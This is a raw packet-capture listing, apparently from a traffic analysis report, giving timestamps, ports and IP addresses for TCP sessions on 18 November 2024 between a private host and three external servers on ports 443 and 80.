                                                                                                                                                  Nov 18, 2024 18:22:23.107266903 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.107274055 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.107518911 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.107564926 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.107570887 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.196055889 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.196115017 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.196126938 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.196438074 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.196445942 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.196489096 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.196499109 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.196826935 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.196835995 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.196880102 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.196888924 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.196897984 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.196927071 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.196927071 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.196947098 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.196980000 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.197364092 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.197371960 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.197412014 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.197417974 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.197599888 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.197644949 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.197652102 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.197951078 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.197995901 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.198003054 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.225640059 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.225697041 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.225709915 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.227157116 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.227214098 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.227221966 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.227483988 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.227536917 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.227544069 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.227607965 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.227644920 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.227653980 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.228015900 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.228060961 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.228066921 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.228427887 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.228480101 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.228487015 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.228590012 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.228629112 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.228637934 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.310631990 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.310692072 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.310700893 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.310766935 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.310775995 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.310811996 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.310820103 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.311084986 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.311120987 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.311131001 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.311137915 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.311171055 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.311391115 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.311402082 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.311436892 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.311767101 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.311814070 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.311821938 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.311937094 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.311981916 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.311989069 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.312345028 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.312391043 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.312397003 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.313009977 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:23.313047886 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:23.313091993 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:36.803253889 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:36.808346033 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:36.808420897 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:36.808487892 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:36.813642025 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.493957996 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.493993998 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.494014978 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.494033098 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.494057894 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.494115114 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.494115114 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:37.494131088 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.494158983 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.494177103 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.494190931 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:37.494240046 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:37.494255066 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.499233961 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.499275923 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:37.499332905 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.499350071 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.499392986 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:37.614075899 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.614094019 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.614119053 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.614141941 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:37.614144087 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.614161015 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.614177942 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.614182949 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:37.614212990 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:37.614224911 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.614963055 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.615005970 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:37.615117073 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.615159988 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.615199089 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:37.615246058 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.615262032 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.615291119 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:37.615650892 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.615667105 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.615681887 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.615701914 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:37.735977888 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.735999107 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.736026049 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.736044884 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.736048937 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:37.736062050 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.736078024 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.736088991 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:37.736094952 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.736109972 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.736114979 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:37.736128092 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.736144066 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.736146927 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:37.736181974 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:37.736567974 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.736728907 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.736745119 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.736761093 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.736769915 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:37.736798048 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:37.855983019 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.856008053 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.856025934 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.856040955 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.856056929 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.856064081 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:37.856074095 CET8049174107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:37.856091976 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:37.856106997 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:38.126641989 CET4917480192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:41.191679955 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:41.198120117 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:41.198175907 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:41.198791027 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:41.198818922 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:41.203742027 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:41.204664946 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.390245914 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.390294075 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.390305996 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.390321016 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.390327930 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.390367031 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.390402079 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.390422106 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.390717030 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.390722036 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.390734911 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.390758038 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.390836954 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.395478964 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.395486116 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.395509005 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.395525932 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.395534039 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.395613909 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.550611019 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.550688028 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.550736904 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.550746918 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.550802946 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.550837040 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.550841093 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.550872087 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.550908089 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.550909042 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.551130056 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.551170111 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.551295996 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.551347971 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.551389933 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.551508904 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.551620007 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.551650047 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.551654100 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.551687002 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.551724911 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.668884039 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.668901920 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.668912888 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.668925047 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.668936968 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.668971062 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.668971062 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.669008970 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.669167995 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.669210911 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.669214010 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.669225931 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.669256926 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.669539928 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.669678926 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.669689894 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.669727087 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.710413933 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.710477114 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.710511923 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.710546970 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.710576057 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.710609913 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.787609100 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.787626982 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.787658930 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.787672997 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.787703991 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.787734985 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.787748098 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.787763119 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.787798882 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.788084984 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.788094997 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.788105965 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.788120031 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.788131952 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.788132906 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.788157940 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.828619003 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.828660965 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.828671932 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.828682899 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.828700066 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.828716993 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.828730106 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.905584097 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.905649900 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.905651093 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.905687094 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.905720949 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.905725002 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.905759096 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.905793905 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.905808926 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.905843973 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.905879974 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.905890942 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.906167984 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.906213999 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.906223059 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.906256914 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.906296015 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.947083950 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.947109938 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.947122097 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.947180033 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:42.947201967 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.947213888 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.947226048 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:42.947251081 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.024163008 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.024198055 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.024211884 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.024240017 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.024262905 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.024270058 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.024337053 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.024349928 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.024378061 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.024561882 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.024597883 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.024601936 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.024607897 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.024653912 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.033272028 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.033293009 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.033337116 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.065450907 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.065491915 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.065506935 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.065558910 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.065570116 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.065572023 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.065583944 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.065612078 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.065618992 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.138634920 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.179452896 CET804917546.173.214.24192.168.2.22
